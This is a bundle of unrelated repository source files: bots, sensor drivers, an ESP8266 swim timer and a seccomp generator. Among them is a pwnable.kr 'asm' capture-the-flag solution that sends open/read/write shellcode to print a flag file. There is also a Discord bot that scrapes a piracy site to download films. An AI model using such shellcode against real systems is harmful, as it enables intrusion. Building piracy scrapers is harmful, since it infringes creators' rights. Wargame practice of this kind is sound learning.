elif receivedMsg == '/attendance':
response = getAttendance()
elif receivedMsg == '/today':
date = date.strftime('%Y-%m-%d')
response = getDay(date)
elif receivedMsg == '/attendanceForToday':
date = date.strftime('%Y-%m-%d')
response = getAttendanceForDay(date)
elif receivedMsg == '/yesterday':
date = date - datetime.timedelta(days=1)
date = date.strftime('%Y-%m-%d')
response = getAttendanceForDay(date)
elif receivedMsg == '/tomorrow':
date = date + datetime.timedelta(days=1)
date = date.strftime('%Y-%m-%d')
response = getDay(date)
else:
response = defaultMessage
bot.sendMessage(chat_id=chatID, text=response)
return 'ok'
@app.route('/{}'.format(AUTORES))
def autores():
method = request.args.get('method')
chatID = os.environ.get('CHATID')
response = ''
date = datetime.date.today()
if method == 'attendance':
response = getAttendance()
elif method == 'today':
date = date.strftime('%Y-%m-%d')
response = getDay(date)
elif method == 'attendanceForToday':
date = date.strftime('%Y-%m-%d')
response = getAttendanceForDay(date)
elif method == 'tomorrow':
date = date + datetime.timedelta(days=1)
date = date.strftime('%Y-%m-%d')
response = getDay(date)
elif method == 'yesterday':
date = date - datetime.timedelta(days=1)
date = date.strftime('%Y-%m-%d')
response = getAttendanceForDay(date)
bot.sendMessage(chat_id=chatID, text=response)
return 'ok'
@app.route('/setwebhook', methods=['GET', 'POST'])
def set_webhook():
bot = telegram.Bot(token=os.environ.get('TOKEN'))
URL = f'https://{request.args.get("name")}.herokuapp.com/'
# we use the bot object to link the bot to our app which live
# in the link provided by URL
s = bot.setWebhook('{URL}{HOOK}'.format(URL=URL, HOOK=os.environ.get('TOKEN')))
# something to let us know things work
if s:
return "webhook setup ok"
else:
return "webhook setup failed"
if __name__ == '__main__':
app.run()
``` |
{
"source": "0xSeb/elastalert_hour_range",
"score": 3
} |
#### File: elastalert_hour_range/elastalert_modules/hour_range_enhancement.py
```python
import dateutil.parser
from elastalert.enhancements import BaseEnhancement
from elastalert.enhancements import DropMatchException
class HourRangeEnhancement(BaseEnhancement):
def process(self, match):
timestamp = None
try:
timestamp = dateutil.parser.parse(match['@timestamp']).time()
except Exception:
try:
timestamp = dateutil.parser.parse(match[self.rule['timestamp_field']]).time()
except Exception:
pass
if timestamp is not None:
time_start = dateutil.parser.parse(self.rule['start_time']).time()
time_end = dateutil.parser.parse(self.rule['end_time']).time()
if(self.rule['drop_if'] == 'outside'):
if timestamp < time_start or timestamp > time_end:
raise DropMatchException()
elif(self.rule['drop_if'] == 'inside'):
if timestamp >= time_start and timestamp <= time_end:
raise DropMatchException()
``` |
{
"source": "0xSebin/SwimTime.github.io",
"score": 3
} |
#### File: SwimTime.github.io/esp8266/ads1x15.py
```python
import ustruct
import time
_REGISTER_MASK = const(0x03)
_REGISTER_CONVERT = const(0x00)
_REGISTER_CONFIG = const(0x01)
_REGISTER_LOWTHRESH = const(0x02)
_REGISTER_HITHRESH = const(0x03)
_OS_MASK = const(0x8000)
_OS_SINGLE = const(0x8000) # Write: Set to start a single-conversion
_OS_BUSY = const(0x0000) # Read: Bit=0 when conversion is in progress
_OS_NOTBUSY = const(0x8000) # Read: Bit=1 when device is not performing a conversion
_MUX_MASK = const(0x7000)
_MUX_DIFF_0_1 = const(0x0000) # Differential P = AIN0, N = AIN1 (default)
_MUX_DIFF_0_3 = const(0x1000) # Differential P = AIN0, N = AIN3
_MUX_DIFF_1_3 = const(0x2000) # Differential P = AIN1, N = AIN3
_MUX_DIFF_2_3 = const(0x3000) # Differential P = AIN2, N = AIN3
_MUX_SINGLE_0 = const(0x4000) # Single-ended AIN0
_MUX_SINGLE_1 = const(0x5000) # Single-ended AIN1
_MUX_SINGLE_2 = const(0x6000) # Single-ended AIN2
_MUX_SINGLE_3 = const(0x7000) # Single-ended AIN3
_PGA_MASK = const(0x0E00)
_PGA_6_144V = const(0x0000) # +/-6.144V range = Gain 2/3
_PGA_4_096V = const(0x0200) # +/-4.096V range = Gain 1
_PGA_2_048V = const(0x0400) # +/-2.048V range = Gain 2 (default)
_PGA_1_024V = const(0x0600) # +/-1.024V range = Gain 4
_PGA_0_512V = const(0x0800) # +/-0.512V range = Gain 8
_PGA_0_256V = const(0x0A00) # +/-0.256V range = Gain 16
_MODE_MASK = const(0x0100)
_MODE_CONTIN = const(0x0000) # Continuous conversion mode
_MODE_SINGLE = const(0x0100) # Power-down single-shot mode (default)
_DR_MASK = const(0x00E0)
_DR_128SPS = const(0x0000) # 128 samples per second
_DR_250SPS = const(0x0020) # 250 samples per second
_DR_490SPS = const(0x0040) # 490 samples per second
_DR_920SPS = const(0x0060) # 920 samples per second
_DR_1600SPS = const(0x0080) # 1600 samples per second (default)
_DR_2400SPS = const(0x00A0) # 2400 samples per second
_DR_3300SPS = const(0x00C0) # 3300 samples per second
_CMODE_MASK = const(0x0010)
_CMODE_TRAD = const(0x0000) # Traditional comparator with hysteresis (default)
_CMODE_WINDOW = const(0x0010) # Window comparator
_CPOL_MASK = const(0x0008)
_CPOL_ACTVLOW = const(0x0000) # ALERT/RDY pin is low when active (default)
_CPOL_ACTVHI = const(0x0008) # ALERT/RDY pin is high when active
_CLAT_MASK = const(0x0004) # Determines if ALERT/RDY pin latches once asserted
_CLAT_NONLAT = const(0x0000) # Non-latching comparator (default)
_CLAT_LATCH = const(0x0004) # Latching comparator
_CQUE_MASK = const(0x0003)
_CQUE_1CONV = const(0x0000) # Assert ALERT/RDY after one conversions
_CQUE_2CONV = const(0x0001) # Assert ALERT/RDY after two conversions
_CQUE_4CONV = const(0x0002) # Assert ALERT/RDY after four conversions
_CQUE_NONE = const(0x0003) # Disable the comparator and put ALERT/RDY in high state (default)
_GAINS = (
_PGA_6_144V, # 2/3x
_PGA_4_096V, # 1x
_PGA_2_048V, # 2x
_PGA_1_024V, # 4x
_PGA_0_512V, # 8x
_PGA_0_256V # 16x
)
_CHANNELS = (_MUX_SINGLE_0, _MUX_SINGLE_1, _MUX_SINGLE_2, _MUX_SINGLE_3)
_DIFFS = {
(0, 1): _MUX_DIFF_0_1,
(0, 3): _MUX_DIFF_0_3,
(1, 3): _MUX_DIFF_1_3,
(2, 3): _MUX_DIFF_2_3,
}
class ADS1115:
def __init__(self, i2c, address=0x49):
self.i2c = i2c
self.address = address
self.gain = 0 # 2/3 6.144V
def _write_register(self, register, value):
data = ustruct.pack('>BH', register, value)
self.i2c.writeto(self.address, data)
def _read_register(self, register):
self.i2c.start()
self.i2c.write(ustruct.pack('>BB', self.address << 1, register))
data = self.i2c.readfrom(self.address, 2)
return ustruct.unpack('>h', data)[0]
def read(self, channel):
self._write_register(_REGISTER_CONFIG, _CQUE_NONE | _CLAT_NONLAT |
_CPOL_ACTVLOW | _CMODE_TRAD | _DR_1600SPS | _MODE_SINGLE |
_OS_SINGLE | _GAINS[self.gain] | _CHANNELS[channel])
while not self._read_register(_REGISTER_CONFIG) & _OS_NOTBUSY:
time.sleep_ms(1)
return self._read_register(_REGISTER_CONVERT)
def diff(self, channel1, channel2):
self._write_register(_REGISTER_CONFIG, _CQUE_NONE | _CLAT_NONLAT |
_CPOL_ACTVLOW | _CMODE_TRAD | _DR_1600SPS | _MODE_SINGLE |
_OS_SINGLE | _GAINS[self.gain] | _DIFFS[(channel1, channel2)])
while not self._read_register(_REGISTER_CONFIG) & _OS_NOTBUSY:
time.sleep_ms(1)
return self._read_register(_REGISTER_CONVERT)
def alert_start(self, channel, threshold):
self._write_register(_REGISTER_HITHRESH, threshold)
self._write_register(_REGISTER_CONFIG, _CQUE_1CONV | _CLAT_LATCH |
_CPOL_ACTVLOW | _CMODE_TRAD | _DR_1600SPS | _MODE_CONTIN |
_MODE_CONTIN | _GAINS[self.gain] | _CHANNELS[channel])
def alert_read(self):
return self._read_register(_REGISTER_CONVERT)
class ADS1015(ADS1115):
def __init__(self, i2c, address=0x48):
return super().__init__(i2c, address)
def read(self, channel):
return super().read(channel) >> 4
def diff(self, channel1, channel2):
return super().diff(channel1, channel2) >> 4
def alert_start(self, channel, threshold):
return super().alert_start(channel, threshold << 4)
def alert_read(self):
return super().alert_read() >> 4
```
#### File: SwimTime.github.io/esp8266/main.py
```python
import ads1x15
import network
import time
import math
import machine
from umqtt.simple import MQTTClient
import micropython
from micropython import const
from machine import Pin
"""
Define constant values
"""
run = False
lapnr = 3 #default lap number
temp = 0.0
wifi_ssid = "Alfabeta"
wifi_pswd = "<PASSWORD>"
server = "io.adafruit.com"
user = "kk2314"
passwd = "<PASSWORD>"
mqtt_temp = "kk2314/feeds/temp"
mqtt_time = "kk2314/feeds/time"
mqtt_rawdata = "kk2314/feeds/rawdata"
mqtt_control = "kk2314/feeds/control"
mqtt_stat = "kk2314/feeds/stat"
mqtt_debug = "kk2314/feeds/debug"
mqtt_tempalert = "kk2314/feeds/tempalert"
"""
Define pins for LED and buzzer
"""
red = Pin(0, Pin.OUT)
blue = Pin(2, Pin.OUT)
p12 = machine.Pin(12)
buzz = machine.PWM(p12)
#function to blink LED
def blink_LED(colour):
colour.off()
time.sleep_ms(50)
colour.on()
time.sleep_ms(50)
#setting up I2C for range finder/ set up ADC
i2c = machine.I2C(scl=machine.Pin(5), sda=machine.Pin(4), freq=100000)
adc = ads1x15.ADS1115(i2c)
adc.gain = 1 #ADS1015_REG_CONFIG_PGA_4_096V
#setting up I2C for temp sens
i2c_temp = machine.I2C(scl=machine.Pin(14), sda=machine.Pin(13), freq=100000)
#Received messages from subscriptions will be delivered to this callback
def sub_cb(topic, msg):
global state
global run
global lapnr
global temp
print((topic, msg))
#Check for messages only for the control topic
if topic == b"kk2314/feeds/control":
if msg == b"start":
run = True
elif msg.decode() == "temp":
get_temp()
payload_temp = "{}".format(temp)
c.publish(mqtt_temp,payload_temp)
print(temp)
else:
lapnr = int(msg)
print(lapnr)
"""
Connect to the wifi
"""
sta_if = network.WLAN(network.STA_IF)
sta_if.active(True)
sta_if.scan()
sta_if.connect(wifi_ssid, wifi_pswd)
print('Connecting to Wi-Fi')
#while connecting blink LED and wait
while not sta_if.isconnected():
blink_LED(red)
pass
print('Wifi connected')
#Turn red LED on (active-low)
red.off()
# Turn off ESP8266's AP
ap_if = network.WLAN(network.AP_IF)
ap_if.active(False)
#Converts the data received from ultrasonic sensor into meters
def convert(data):
global distance
distance = data/10000
distance = distance/0.000976562 #vcc/(1025*5)
distance = (distance/1000)+0.16 #distance offset
#Send a read request and read information of temp sensor as well as convert temp into degree celcius
def get_temp():
global temp
i2c_temp.writeto(0x40, bytearray([0xf3]))
time.sleep(0.5)
data=i2c_temp.readfrom(0x40, 2)
tempraw=int.from_bytes(data, "big")
temp = 175.72 * tempraw / 65536
temp = temp - 46.85
#sets up the buzzer to run a countdown composed of 3 short beeps and a long one
def countdown():
count = 0
freq = 300
while count < 3:
buzz.freq(400)
buzz.duty(512)
time.sleep(0.7)
buzz.duty(1023)
time.sleep(0.7)
count = count + 1
buzz.freq(500)
buzz.duty(512)
time.sleep(1.25)
buzz.duty(1023)
#converts secs into min and seconds
def format(sec):
sec = sec/1000
mins, secs = divmod( sec, 60)
secs = round(secs, 3)
return (mins, secs)
#main() function which executes sensing and mqtt push
def main(server):
global run
global lapnr
global nr
global c
global mqttConnected
"""
Defines which client to connect to.
Using adafruit.io broker requires authentification
so we also set username and password
"""
c = MQTTClient("Sensor boards", server, user = user, password = <PASSWORD>)
c.set_callback(sub_cb)
#sets flag for mqtt connected
if c.connect() == False:
mqttConnected = True
print('MQTT Connected')
#subscribe to the topic where controls are received
c.subscribe("kk2314/feeds/control")
while True:
if True:
c.wait_msg() #blocking check for message
#start timing laps
if run == True:
#reset the run flag
run = False
#do countdown
countdown()
c.publish(mqtt_debug,"Started countdown")
#start timer
start = time.ticks_ms()
c.publish(mqtt_debug,"Timer started")
print("go")
#wait for user to go away from sensor
time.sleep(5)
#resets statistical variables every beginning of run
lap_index = 0
best_lap= 0
avr_lap = 0
total_time= 0
worst_lap = 0
#main while loop which continues until lapnr goes to 0
while lapnr > 0:
blink_LED(blue)
data = adc.read(0)
convert(data)
#if sensor detects object within threshold it times a lap
if distance < 0.80:
lap_time_raw = time.ticks_diff(time.ticks_ms(), start)
#reset time measure
start = time.ticks_ms()
c.publish(mqtt_debug, "Lap end detected")
lap_index = lap_index + 1
total_time = total_time + lap_time_raw
#check if the lap is the slowest
if lap_time_raw > worst_lap:
worst_lap = lap_time_raw
worst_index = lap_index
#update average lap_time
avr_lap = total_time/lap_index
#check if lap is the fastest
if lap_index == 1:
best_lap = lap_time_raw
best_index = 1
elif lap_time_raw < best_lap:
best_lap = lap_time_raw
best_index = lap_index
#format all the statistical values in mins, secs
mins_av, secs_av = format(avr_lap)
mins_bs, secs_bs = format(best_lap)
mins_ws, secs_ws = format(worst_lap)
mins_to, secs_to = format(total_time)
mins, secs = format(lap_time_raw)
#read current temp
get_temp()
#send alert if temperature is outside ideal range
if temp > 21 and temp < 29:
c.publish(mqtt_tempalert, "Temperature is ideal for a splash, Happy Swimming!")
elif temp < 21:
c.publish(mqtt_tempalert, "Careful! We have detected temperature is outside ideal range (Too low)")
elif temp > 29:
c.publish(mqtt_tempalert, "Careful! We have detected temperature is outside ideal range (Too high)")
#encode all data to JSON - manually to save memory
payload_temp = "{}".format(temp)
payload = " Lap number {} was: {} m {} s. ".format( lap_index, mins, secs)
payload_raw = "{}".format(lap_time_raw/1000)
payload_stat_av = "Average lap time is : {} m {} s ".format(mins_av,secs_av)
payload_stat_bs = "Best lap was lap number {} : {} m {} s ".format(best_index,mins_bs,secs_bs)
payload_stat_ws = "Worst lap was lap number {} : {} m {} s ".format(worst_index,mins_ws,secs_ws)
payload_stat_to = "Total time is : {} m {} s ".format(mins_to,secs_to)
#publish converted and raw data to mqtt broker
c.publish(mqtt_time,payload)
c.publish(mqtt_rawdata, payload_raw)
c.publish(mqtt_temp,payload_temp)
c.publish(mqtt_stat,payload_stat_av)
c.publish(mqtt_stat,payload_stat_bs)
c.publish(mqtt_stat,payload_stat_ws)
c.publish(mqtt_stat,payload_stat_to)
c.publish(mqtt_debug, "Data published successfully")
lapnr = lapnr - 1
#wait for 10 sec for object to get out of range of sensor
if lapnr != 0:
time.sleep(10)
c.publish(mqtt_debug, "Done with current run") #debug messages
else:
c.check_msg() #non-blocking check for message
#start timing laps
if run == True:
#reset the run flag
run = False
#do countdown
countdown()
c.publish(mqtt_debug,"Started countdown")
#start timer
start = time.ticks_ms()
c.publish(mqtt_debug,"Timer started")
print("go")
#wait for user to go away from sensor
time.sleep(5)
#resets statistical variables every beginning of run
lap_index = 0
best_lap= 0
avr_lap = 0
total_time= 0
worst_lap = 0
#main while loop which continues until lapnr goes to 0
while lapnr > 0:
blink_LED(blue)
data = adc.read(0)
convert(data)
#if sensor detects object within threshold it times a lap
if distance < 0.80:
lap_time_raw = time.ticks_diff(time.ticks_ms(), start)
#reset time measure
start = time.ticks_ms()
c.publish(mqtt_debug, "Lap end detected")
lap_index = lap_index + 1
total_time = total_time + lap_time_raw
#check if the lap is the slowest
if lap_time_raw > worst_lap:
worst_lap = lap_time_raw
worst_index = lap_index
#update average lap_time
avr_lap = total_time/lap_index
#check if lap is the fastest
if lap_index == 1:
best_lap = lap_time_raw
best_index = 1
elif lap_time_raw < best_lap:
best_lap = lap_time_raw
best_index = lap_index
#format all the statistical values in mins, secs
mins_av, secs_av = format(avr_lap)
mins_bs, secs_bs = format(best_lap)
mins_ws, secs_ws = format(worst_lap)
mins_to, secs_to = format(total_time)
mins, secs = format(lap_time_raw)
#read current temp
get_temp()
#send alert if temperature is outside ideal range
if temp > 21 and temp < 29:
c.publish(mqtt_tempalert, "Temperature is ideal for a splash, Happy Swimming!")
elif temp < 21:
c.publish(mqtt_tempalert, "Careful! We have detected temperature is outside ideal range (Too low)")
elif temp > 29:
c.publish(mqtt_tempalert, "Careful! We have detected temperature is outside ideal range (Too high)")
#encode all data to JSON - manually to save memory
payload_temp = "{}".format(temp)
payload = " Lap number {} was: {} m {} s. ".format( lap_index, mins, secs)
payload_raw = "{}".format(lap_time_raw/1000)
payload_stat_av = "Average lap time is : {} m {} s ".format(mins_av,secs_av)
payload_stat_bs = "Best lap was lap number {} : {} m {} s ".format(best_index,mins_bs,secs_bs)
payload_stat_ws = "Worst lap was lap number {} : {} m {} s ".format(worst_index,mins_ws,secs_ws)
payload_stat_to = "Total time is : {} m {} s ".format(mins_to,secs_to)
#publish converted and raw data to mqtt broker
c.publish(mqtt_time,payload)
c.publish(mqtt_rawdata, payload_raw)
c.publish(mqtt_temp,payload_temp)
c.publish(mqtt_stat,payload_stat_av)
c.publish(mqtt_stat,payload_stat_bs)
c.publish(mqtt_stat,payload_stat_ws)
c.publish(mqtt_stat,payload_stat_to)
c.publish(mqtt_debug, "Data published successfully")
lapnr = lapnr - 1
#wait for 10 sec for object to get out of range of sensor
if lapnr != 0:
time.sleep(10)
c.publish(mqtt_debug, "Done with current run") #debug messages
c.disconnect()
if __name__ == "__main__":
main(server)
``` |
{
"source": "0xShad3/cybersec-writeups",
"score": 2
} |
#### File: pwnable.kr/asm/exploit.py
```python
from pwn import *
context.update(arch="amd64",os="linux",bit=64)
rssh = ssh(host="pwnable.kr",port=2222,user="asm",password="<PASSWORD>")
p = rssh.connect_remote("localhost",9026)
def pwn(shellcode):
p.recvuntil("give me your x64 shellcode:")
p.send(shellcode)
p.interactive()
p.close()
def shellcraft():
shellcode = shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode += shellcraft.open('rsp', 0, 0)
shellcode += shellcraft.read('rax', 'rsp', 100)
shellcode += shellcraft.write(1, 'rsp', 100)
shellcode += shellcraft.exit()
pwn(shellcode)
def hcAssembly():
shellcode = asm("""
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
jmp init
open:
pop rdi
mov rax,2
syscall
read:
mov rdi,rax
mov rsi,rsp
mov rdx,0x40
xor rax,rax
syscall
write:
mov rdi,1
mov rdx,40
mov rax,1
syscall
exit:
mov rax,0x3c
syscall
init:
call open
.ascii "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"
.byte 0
""")
pwn(shellcode)
while(1):
print("There are two ways to exploit this either by hardcoded assembly (1) \n or by using pwnlib's shellcrafting")
selection = input()
if (selection == 1):
hcAssembly()
exit(0)
elif (selection == 2):
shellcraft()
``` |
{
"source": "0xSmiley/Runtime",
"score": 2
} |
#### File: Runtime/Tracer/seccompGenerator.py
```python
import sys
firstPart="""
{
"defaultAction": "SCMP_ACT_ERRNO",
"syscalls": [
{
"names": [
"""
secondPart=""" "$" """
thirdPart="""
],
"action": "SCMP_ACT_ALLOW"
}
]
}
"""
def EbpfMode(uts):
syscalls=[]
fd=open("Captures/"+uts+".json", "w")
fd.write(firstPart)
with open("Captures/"+uts+'.cap') as log:
line=log.readline()
line=log.readline()
while line:
parts=line.split(';')
syscall=parts[3].strip()
if syscall not in syscalls:
if len(syscalls) != 0:
fd.write(',\n')
if syscall == "newuname":
newModule=secondPart.replace('$',"uname")
fd.write(newModule)
fd.write(',\n')
elif syscall == "newstat":
newModule=secondPart.replace('$',"stat")
fd.write(newModule)
fd.write(',\n')
elif syscall == "newfstatat":
newModule=secondPart.replace('$',"fstatat")
fd.write(newModule)
fd.write(',\n')
elif syscall == "newfstat":
newModule=secondPart.replace('$',"fstat")
fd.write(newModule)
fd.write(',\n')
elif syscall == "newlstat":
newModule=secondPart.replace('$',"lstat")
fd.write(newModule)
fd.write(',\n')
module=secondPart.replace('$',syscall)
fd.write(module)
syscalls.append(syscall)
line=log.readline()
fd.write(thirdPart)
fd.close()
log.close()
def standardMode(path):
syscallList=[]
with open(path) as log:
line=log.readline()
fd=open("outputSeccomp.json", "w")
fd.write(firstPart)
while line:
syscall=line.strip()
if syscall not in syscallList:
if len(syscallList) != 0:
fd.write(',\n')
module=secondPart.replace('$',syscall)
fd.write(module)
syscallList.append(syscall)
line=log.readline()
fd.write(thirdPart)
fd.close()
log.close()
if len(sys.argv) > 1:
path = sys.argv[1]
if path != "":
standardMode(path)
``` |
{
"source": "0xsmoos/PMD",
"score": 3
} |
#### File: 0xsmoos/PMD/bot.py
```python
import time
from threading import Thread
import discord
from requests.exceptions import MissingSchema
from discord.ext import commands, tasks
from scraper import Scraper
from errors import NoResults
import config as cfg
import media
import download
credentials = media.read_file("credentials.md", filter=True)
scraper = Scraper()
token = credentials[0]
allowed_users = credentials[1:]
channel_id = {
"commands": 776367990560129066,
"log": 776354053222826004,
"spam": 780948981299150888,
}
bot = commands.Bot(command_prefix=
[
"beta ",
"Beta ",
"BETA ",
"test ",
],
help_command=None, case_insensitive=True)
# |
# Discord Functions |
# V
@bot.event
async def on_ready():
check_logs.start()
print(f"{bot.user} successfuly connected!")
await set_status("Free Movies on Plex!", discord.Status.online)
@bot.listen("on_message")
async def on_message(message):
if not message.content.startswith("https://gomovies-online."): return
if message.channel.id != channel_id["commands"]: return
if message.author == bot.user: return
await send("Testing link...", silent=False)
# if "--res=" in message.content:
# forced_resolution = message.content.split("--res=")[1]
# cfg.write_attempts(int(forced_resolution))
author = message.author
source_url = message.content
download_queue = scraper.get_download_link(source_url)
for data in download_queue:
target_url, metadata, *_ = data
run_download(target_url, metadata, author.id)
@tasks.loop(seconds=0.5)
async def check_logs(filename="log.txt"):
log_data = media.read_file(filename, filter=True)
if log_data:
media.write_file(filename, "### Beginning of message buffer from server ###\n")
bulk_message = []
for message in log_data:
if "--embed" in message:
metadata = eval(message.replace("--embed",""))
await create_embed(metadata)
elif "--channel=" in message:
message = message.split("--channel=")
await send(message[0], channel=message[1])
elif "--file" in message:
await send(message)
# elif "--res=" in message:
# forced_resolution = message.split("--res=")[1]
# cfg.write_attempts(int(forced_resolution))
# bulk_message.append(message.split("--res=")[0])
else:
bulk_message.append(message)
if bulk_message: await send("\n".join(bulk_message))
# |
# Discord Commands |
# V
@bot.command()
async def downloads(ctx, user: discord.User, *flags):
total_size = 0 # This is in MB
movies = []
user_id = user.id
lines = media.read_file(f"{user_id}.txt", filter=True)
for line in lines:
line = line.split("|")
movies.append(line[0])
total_size += float(line[2])
if "--list" in flags:
await send("{}".format("\n".join(movies)))
author = user.display_name
total_size = (
f"{int(round(total_size, 0))} MB" if total_size < 2048 else f"{round(total_size/1024, 2)} GB"
)
await send(
f"{author} has downloaded {len(movies)} movies/episodes totaling {total_size}."
)
@bot.command(aliases=["add", "download"])
async def download_first_result(ctx, *movie_name):
movie_name = " ".join(movie_name)
author = ctx.author.id
scraper.author = author
if "https://gomovies-online." in movie_name:
await send("Downloading via direct link...")
download_queue = scraper.get_download_link(movie_name) # This would be a link not a query
else:
await send("Searching for matches...")
try:
download_queue = scraper.download_first_from_search(movie_name) # Searches using a movie title
except NoResults:
download_queue = None
if download_queue:
for data in download_queue:
url, metadata, author = data
if url:
# If there were results and there is a valid URL, then download
await send("Link found, downloading starting...")
print(f"DEBUG: {metadata}")
await create_embed(metadata[list(metadata)[0]])
run_download(url, metadata[list(metadata)[0]], author)
else:
await send("**ERROR**: No search results found!")
else:
await send("No results!", silent=False)
@bot.command()
async def search(ctx, *search_query):
search_query = " ".join(search_query)
author = ctx.author.id
scraper.author = author
start_time = time.time()
if search_query:
results, metadata = scraper.search(
"https://gomovies-online.cam/search/" + \
"-".join(search_query.split())
)
print(f"Finished scraping search results in {round(time.time()-start_time,2)} seconds!")
if results and metadata:
for description in metadata:
# print(description)
await create_embed(metadata[description])
else:
await send("**ERROR**: No search results found!")
@bot.command()
async def react(ctx):
await ctx.message.add_reaction("\U0001F44D")
@bot.command(aliases=["status", "validate"])
async def validate_url(ctx, *url):
url = " ".join(url)
try:
status_code = download.validate_url(url)[0]
await send(f"Status for URL: {status_code}")
except MissingSchema as error:
await send(str(error))
@bot.command()
async def solve(ctx, captcha_solution):
await ctx.message.delete()
filename = "solved_captcha.txt"
media.write_file(filename, captcha_solution)
await ctx.send("Attempting captcha solve...")
# |
# Async Functions |
# V
async def create_embed(metadata, color=0xcbaf2f, channel="commands"):
embed = discord.Embed(
title=metadata["data-filmname"],
description=metadata["data-genre"],
color=color
)
embed.set_footer(text=metadata["data-descript"])
embed.set_thumbnail(url=metadata["img"])
embed.add_field(name="\U0001F4C5", value=metadata["data-year"], inline=True)
embed.add_field(name="IMDb", value=metadata["data-imdb"], inline=True)
embed.add_field(name="\U0001F554", value=metadata["data-duration"], inline=True)
await bot.get_channel(channel_id[channel]).send(embed=embed)
async def send(msg, channel="commands", silent=True):
channel = bot.get_channel(channel_id[channel])
if "--file" in msg:
msg = msg.split("--file=")
print(f"DEBUG: msg contains \"--file\" and the filename is \"{msg[1]}\"")
await channel.send(msg[0].strip())
await channel.send(file=discord.File(msg[1]))
else:
await channel.send(msg)
if not silent: print(msg)
async def set_status(activity, status=discord.Status.online):
await bot.change_presence(status=status, activity=discord.Game(activity))
# |
# Functions |
# V
def run_download(url, metadata, author):
download_function = download.Download(url, metadata, author)
threaded_download = Thread(target=download_function.run)
threaded_download.start()
def run():
return bot.run(token)
if __name__ == "__main__":
run()
```
#### File: PMD/code (OLD)/server OLD.py
```python
from __future__ import print_function
import socket
# unused ports: 26490-26999
port = 26490
address = socket.gethostbyname(socket.gethostname())
# IPv4 and TCP
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Binding socket...")
s.bind((address, port))
print(f"Listnening for connections on \'{address}:{port}\"...")
s.listen(5)
def send(msg, encoding="utf8"):
if msg.replace(" ","") == "":
print("No text entered, nothing was sent.")
else:
clientsocket.send(msg.encode(encoding))
print(f"Sent URL:\n> {msg}")
clientsocket, address = s.accept()
print(f"Connection from {address} has been established!")
send("Welcome to the server!")
running = True
while running:
send(input("Enter a URL to send:\n> "))
```
#### File: 0xsmoos/PMD/config.py
```python
import socket
import os
#
# [NETWORKING]
#
local_server_address = socket.gethostbyname(socket.gethostname())
remote_server_address = "127.0.0.1"
server_port = 26490
network_buffer = 1024
max_connections = 5
max_retries = 2
proxy = False
# proxy = {
# "http": "socks5://192.168.50.98:9667",
# "https": "socks5://192.168.50.98:9667"
# }
#
# [DOWNLOAD OPTIONS]
#
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
# video_quality = [2160, 1440, 1080, 720, 480, 360]
video_quality = [2160, 1440, 1080, 720, 480, 360]
stream_chunk_size = 8*1024*1024
timeout = 60
executable = "chromedriver.exe" if os.name == "nt" else "chromedriver"
# [FUNCTIONS]
def reset_attempts():
buffer = []
with open("config.py", "r") as file:
lines = file.read().split("\n")
for line in lines:
if line[:20] == "download_attempts = ":
line = "download_attempts = 0"
buffer.append(line)
with open("config.py", "w") as file:
file.write("\n".join(buffer))
def read_attempts():
with open("config.py", "r") as file:
lines = file.read().split("\n")
for line in lines:
if line[:20] == "download_attempts = ":
return line[20:]
return False
def increment_attempts():
buffer = []
with open("config.py", "r") as file:
lines = file.read().split("\n")
for line in lines:
if line[:20] == "download_attempts = ":
line = f"download_attempts = {int(line[20:])+1}"
buffer.append(line)
with open("config.py", "w") as file:
file.write("\n".join(buffer))
def write_attempts(count):
buffer = []
with open("config.py", "r") as file:
lines = file.read().split("\n")
for line in lines:
if line[:20] == "download_attempts = ":
line = f"download_attempts = {count}"
buffer.append(line)
with open("config.py", "w") as file:
file.write("\n".join(buffer))
```
#### File: 0xsmoos/PMD/download.py
```python
import os
from threading import Thread
import requests
from requests.exceptions import *
from urllib3.exceptions import SSLError
from scraper import Scraper
from stream import Stream
import config as cfg
import media
from media import log
headers = {"user-agent": cfg.user_agent}
resolution_list = cfg.video_quality
media_files = media.Media("MOVIES")
home = os.getcwd()
requests.adapters.HTTPAdapter(max_retries=cfg.max_retries)
def url_format(url, target_res, old_res="360"):
url = url.replace(f"/{old_res}?name=",f"/{target_res}?name=")
url = url.replace(f"_{old_res}&token=ip=",f"_{target_res}&token=ip=")
return url
def validate_url(url, target_res=None):
if target_res:
url = url_format(url, target_res)
error_message = ""
try:
request = requests.get(
url,
headers=headers,
proxies=(cfg.proxy if cfg.proxy else None),
stream=True,
timeout=(30,60)
)
status_code = request.status_code
except ConnectionError:
error_message = " (check the port on the proxy?)"
status_code = 403
request = None
print(f"STATUS for {target_res}p: {status_code}{error_message}" if target_res else None)
return status_code, request
class Download:
def __init__(self, url, metadata, author):
self.url = url
self.metadata = metadata
self.author = author
def best_quality(self, url):
if not url:
log("ERROR: No URL! Maybe there were no search results?", silent=False)
return False, None, None
if not isinstance(url, str):
url = url.get_attribute("src")
valid_resolutions = []
for target_res in resolution_list: # TODO: The proccess of checking every resolution's status code takes too long (fix me)
valid_resolution, request = validate_url(url, target_res)
valid_resolutions.append(valid_resolution)
if valid_resolutions[-1] == 200:
url = url_format(url, target_res)
break
if valid_resolutions[-1] == 403:
filmname = self.metadata["data-filmname"]
log(f"ERROR: Link expired while scraping \"{filmname}\".")
return False, None, None
if 200 not in valid_resolutions:
log(f"ERROR: Status code {valid_resolutions[-1]}.")
return False, None, None
return url, request, target_res
def run(self, resolution_override=None):
# Function should return True when the download is complete and False if it perminantly failed
self.url, request, resolution = self.best_quality(self.url)
if self.url is False:
return False
filmname = self.metadata["data-filmname"]
year = self.metadata["data-year"]
if "Season" in filmname and "Episode" in filmname:
print("Media is detected as TV Show.")
show_title = filmname.split(" - ")[0]
season = filmname.split(" - Season ")[1].split(" Episode")[0].split(" [")[0]
season = season if len(season) >= 2 else "0" + season
